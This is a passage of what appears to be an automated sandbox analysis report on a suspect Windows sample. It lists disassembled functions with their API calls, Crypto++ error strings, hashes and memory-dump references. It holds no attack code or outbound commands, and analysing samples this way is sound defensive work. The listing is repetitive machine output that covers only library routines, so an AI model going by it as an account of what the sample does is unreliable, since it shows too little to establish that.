                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0D70E0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 187COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0D7267
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Exception@8Throw
                                                                      • String ID: exceeds the maximum of $ is less than the minimum of $: IV length
                                                                      • API String ID: 2005118841-1273958906
                                                                      • Opcode ID: c9d7afb0fb53a906cae62cc7d80d53d0a359ad5bde8d9d038e379099c78fc146
                                                                      • Instruction ID: 364eda9a5c6a7d74b72b5366060443c6a13bc0302d1dac1f3a3771f9fe3bb162
                                                                      • Opcode Fuzzy Hash: c9d7afb0fb53a906cae62cc7d80d53d0a359ad5bde8d9d038e379099c78fc146
                                                                      • Instruction Fuzzy Hash: E4616475108380AFD321DBA8C884FDFB7E9BF99344F104A1DE59987292DB75A904C7A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0A4D90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 6F0A4DA9
                                                                        • Part of subcall function 6F109125: std::exception::exception.LIBCMT ref: 6F10913A
                                                                        • Part of subcall function 6F109125: __CxxThrowException@8.LIBCMT ref: 6F10914F
                                                                        • Part of subcall function 6F109125: std::exception::exception.LIBCMT ref: 6F109160
                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 6F0A4DCA
                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 6F0A4DE5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw
                                                                      • String ID: invalid string position$string too long
                                                                      • API String ID: 4225265588-4289949731
                                                                      • Opcode ID: 10450050f5e6c7247804047ed8604117a5d58ca80a0325bfe893595088370e98
                                                                      • Instruction ID: 06e49614e7f557d11177a48000493f122249d7be4c9b1c9e67704514ece16b60
                                                                      • Opcode Fuzzy Hash: 10450050f5e6c7247804047ed8604117a5d58ca80a0325bfe893595088370e98
                                                                      • Instruction Fuzzy Hash: D9318B3A3042109BD714DEACE890B5AF3E6BF95764F10062FE551CB291DB72E8508791
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 061B0F14 Relevance: 7.7, Strings: 6, Instructions: 201COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049595696.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_61b0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HERE$HERE$LOOK$LOOK$p<{q$p<{q
                                                                      • API String ID: 0-1229034622
                                                                      • Opcode ID: 66fb2345121f81cc1f67d67feb2872002be4bca6605824818c7a662b7cb72a86
                                                                      • Instruction ID: a87cf2816a3781966ba65e5d116acb3fdde7570ea9835622b912c78e897d95ef
                                                                      • Opcode Fuzzy Hash: 66fb2345121f81cc1f67d67feb2872002be4bca6605824818c7a662b7cb72a86
                                                                      • Instruction Fuzzy Hash: 4AA1A274E002299FDBA8DF68C995BE9B7B1BB58300F1585E9D50DAB360DB309E81CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0D1D50 Relevance: 7.6, APIs: 5, Instructions: 144timesleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Timetime$Sleep
                                                                      • String ID:
                                                                      • API String ID: 4176159691-0
                                                                      • Opcode ID: d3a71cac558f1027b7484235ced692c8a055059ab0150bd8be2ad067304e1496
                                                                      • Instruction ID: b9420e074b55f33da45e9cb1ee16c768ca312472e0906853b890d86b7b42d254
                                                                      • Opcode Fuzzy Hash: d3a71cac558f1027b7484235ced692c8a055059ab0150bd8be2ad067304e1496
                                                                      • Instruction Fuzzy Hash: CA51B0B1D043449FEB11EFA8D881B9D7BF4BB45394F50856EE808EB380DB71A958CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0B6D40 Relevance: 7.6, APIs: 5, Instructions: 136COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 6F109BB5: _malloc.LIBCMT ref: 6F109BCF
                                                                      • _rand.LIBCMT ref: 6F0B6DEA
                                                                        • Part of subcall function 6F109E0C: __getptd.LIBCMT ref: 6F109E0C
                                                                      • std::exception::exception.LIBCMT ref: 6F0B6E17
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0B6E2C
                                                                      • std::exception::exception.LIBCMT ref: 6F0B6E3B
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0B6E50
                                                                        • Part of subcall function 6F109BB5: std::exception::exception.LIBCMT ref: 6F109C04
                                                                        • Part of subcall function 6F109BB5: std::exception::exception.LIBCMT ref: 6F109C1E
                                                                        • Part of subcall function 6F109BB5: __CxxThrowException@8.LIBCMT ref: 6F109C2F
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: std::exception::exception$Exception@8Throw$__getptd_malloc_rand
                                                                      • String ID:
                                                                      • API String ID: 2791304714-0
                                                                      • Opcode ID: a05724f3847089d8aa5a0f06c993db6506cfd918802c7114a1de4a636874697b
                                                                      • Instruction ID: 1159f933aacd600cff1de2001cd33fd09b4029c658ae5fbfa65c6de767bd799d
                                                                      • Opcode Fuzzy Hash: a05724f3847089d8aa5a0f06c993db6506cfd918802c7114a1de4a636874697b
                                                                      • Instruction Fuzzy Hash: 145118B2900748AFC710DF59C890A9AFBF4FB09354F408A6EE85A97B41D775F914CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0B7750 Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6F0B7761
                                                                      • LeaveCriticalSection.KERNEL32(00000000,?), ref: 6F0B7782
                                                                      • EnterCriticalSection.KERNEL32(00000018), ref: 6F0B7796
                                                                      • LeaveCriticalSection.KERNEL32(00000018), ref: 6F0B77CE
                                                                      • QueueUserWorkItem.KERNEL32(6F0D1D50,00000000,00000010), ref: 6F0B780C
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave$ItemQueueUserWork
                                                                      • String ID:
                                                                      • API String ID: 584243675-0
                                                                      • Opcode ID: d2ee478ab488556c52539559ec6e7263cdf95f731212c91d2a61a6a861bab5d9
                                                                      • Instruction ID: 48b7ffd09242ea0497d69dcb6a34bdd6e7ef297d4a290b95a805eb5688583b05
                                                                      • Opcode Fuzzy Hash: d2ee478ab488556c52539559ec6e7263cdf95f731212c91d2a61a6a861bab5d9
                                                                      • Instruction Fuzzy Hash: 6C216B71541608AFDB10CFA4D944BDABBF8FB45350F40855EE85687641DB32F688CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F10F03B Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __getptd.LIBCMT ref: 6F10F047
                                                                        • Part of subcall function 6F10EAE6: __getptd_noexit.LIBCMT ref: 6F10EAE9
                                                                        • Part of subcall function 6F10EAE6: __amsg_exit.LIBCMT ref: 6F10EAF6
                                                                      • __amsg_exit.LIBCMT ref: 6F10F067
                                                                      • __lock.LIBCMT ref: 6F10F077
                                                                      • InterlockedDecrement.KERNEL32(?), ref: 6F10F094
                                                                      • InterlockedIncrement.KERNEL32(05DE1608), ref: 6F10F0BF
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                      • String ID:
                                                                      • API String ID: 4271482742-0
                                                                      • Opcode ID: 3456ebd8b1c653e810f3a936850774f5506f98740f080fb3d5d3bd2215e91fa3
                                                                      • Instruction ID: 85d546aece2017eb8f3ebc913dee7e33d62142d81465aff11ca2184353e87749
                                                                      • Opcode Fuzzy Hash: 3456ebd8b1c653e810f3a936850774f5506f98740f080fb3d5d3bd2215e91fa3
                                                                      • Instruction Fuzzy Hash: D501A931901B21ABDB12BB65880679E7762FF457E4F100146E824A76C8CF25B8B5CBDD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F10F7BC Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __getptd.LIBCMT ref: 6F10F7C8
                                                                        • Part of subcall function 6F10EAE6: __getptd_noexit.LIBCMT ref: 6F10EAE9
                                                                        • Part of subcall function 6F10EAE6: __amsg_exit.LIBCMT ref: 6F10EAF6
                                                                      • __getptd.LIBCMT ref: 6F10F7DF
                                                                      • __amsg_exit.LIBCMT ref: 6F10F7ED
                                                                      • __lock.LIBCMT ref: 6F10F7FD
                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 6F10F811
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                      • String ID:
                                                                      • API String ID: 938513278-0
                                                                      • Opcode ID: 88bae4514f4de085736d94cc1059359228156b541c0d6f8929d6cb063466c361
                                                                      • Instruction ID: 80b7ba0932b9eb7058041092977e0892572634b5e47dfedb4d2a092833928a76
                                                                      • Opcode Fuzzy Hash: 88bae4514f4de085736d94cc1059359228156b541c0d6f8929d6cb063466c361
                                                                      • Instruction Fuzzy Hash: 18F0B4329447109BE721BB799406B8D33A0BF447E8F21411AE820A72C0DF247575DB5A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0A2090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 6F0A4010: std::_Xinvalid_argument.LIBCPMT ref: 6F0A402A
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0A211F
                                                                        • Part of subcall function 6F10AC75: RaiseException.KERNEL32(?,?,6F109C34,F3D820D6,?,?,?,?,6F109C34,F3D820D6,6F139C90,6F14B974,F3D820D6), ref: 6F10ACB7
                                                                        • Part of subcall function 6F0A4010: std::_Xinvalid_argument.LIBCPMT ref: 6F0A4067
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0A21BF
                                                                      Strings
                                                                      • PK_MessageAccumulator: DigestSize() should not be called, xrefs: 6F0A20BD
                                                                      • PK_MessageAccumulator: TruncatedFinal() should not be called, xrefs: 6F0A215D
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise
                                                                      • String ID: PK_MessageAccumulator: DigestSize() should not be called$PK_MessageAccumulator: TruncatedFinal() should not be called
                                                                      • API String ID: 4088727247-1268710280
                                                                      • Opcode ID: c1f480a75ab909439a7b1f0da0f95199799199534808029feff6ede98cbe606d
                                                                      • Instruction ID: defa82f6dce55cbbb6d49fbbc26cf20fc2608eba8d09376ad9c40b47f7f4baf1
                                                                      • Opcode Fuzzy Hash: c1f480a75ab909439a7b1f0da0f95199799199534808029feff6ede98cbe606d
                                                                      • Instruction Fuzzy Hash: 73414874C0438CAECB05DFE9D890BEDFBB8BB19394F50422AE421B7291DB752658CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0A1D30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 113COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 6F0A4010: std::_Xinvalid_argument.LIBCPMT ref: 6F0A402A
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0A1DC9
                                                                        • Part of subcall function 6F10AC75: RaiseException.KERNEL32(?,?,6F109C34,F3D820D6,?,?,?,?,6F109C34,F3D820D6,6F139C90,6F14B974,F3D820D6), ref: 6F10ACB7
                                                                        • Part of subcall function 6F0A4010: std::_Xinvalid_argument.LIBCPMT ref: 6F0A4067
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0A1E74
                                                                      Strings
                                                                      • CryptoMaterial: this object contains invalid values, xrefs: 6F0A1E16
                                                                      • BufferedTransformation: this object is not attachable, xrefs: 6F0A1D67
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise
                                                                      • String ID: BufferedTransformation: this object is not attachable$CryptoMaterial: this object contains invalid values
                                                                      • API String ID: 4088727247-3853263434
                                                                      • Opcode ID: a11c6c8591d8e99e583294e86bf5f5df6a7eef75360830a448bf23e4dde8bf62
                                                                      • Instruction ID: 5139fa854cd4cd91f7c5f37ab5925e9a42e610b46f7b366846ac32fd9d2803df
                                                                      • Opcode Fuzzy Hash: a11c6c8591d8e99e583294e86bf5f5df6a7eef75360830a448bf23e4dde8bf62
                                                                      • Instruction Fuzzy Hash: AC416D74C04288AFCB04DFE9D890BDEFBB8FF08354F10826AE425A7291DB356614CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0A4010 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 6F0A402A
                                                                        • Part of subcall function 6F109125: std::exception::exception.LIBCMT ref: 6F10913A
                                                                        • Part of subcall function 6F109125: __CxxThrowException@8.LIBCMT ref: 6F10914F
                                                                        • Part of subcall function 6F109125: std::exception::exception.LIBCMT ref: 6F109160
                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 6F0A4067
                                                                        • Part of subcall function 6F1090D8: std::exception::exception.LIBCMT ref: 6F1090ED
                                                                        • Part of subcall function 6F1090D8: __CxxThrowException@8.LIBCMT ref: 6F109102
                                                                        • Part of subcall function 6F1090D8: std::exception::exception.LIBCMT ref: 6F109113
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                      • String ID: invalid string position$string too long
                                                                      • API String ID: 1823113695-4289949731
                                                                      • Opcode ID: 184174657cad547ac21e39698db560c847189dfdf2d0d90ab241c50db402b345
                                                                      • Instruction ID: b747846cf0615e4d3ba165133ef8e2a3dbd30ec0aee4606f7d5d985a6f3b778b
                                                                      • Opcode Fuzzy Hash: 184174657cad547ac21e39698db560c847189dfdf2d0d90ab241c50db402b345
                                                                      • Instruction Fuzzy Hash: 8931B83A304210ABD7209E9CEC90F5AF7E9FB95665F20092FF151CB292DF7398609791
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0D6480 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0D6518
                                                                        • Part of subcall function 6F10AC75: RaiseException.KERNEL32(?,?,6F109C34,F3D820D6,?,?,?,?,6F109C34,F3D820D6,6F139C90,6F14B974,F3D820D6), ref: 6F10ACB7
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0D6558
                                                                      Strings
                                                                      • Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 6F0D64E7
                                                                      • Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 6F0D6527
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
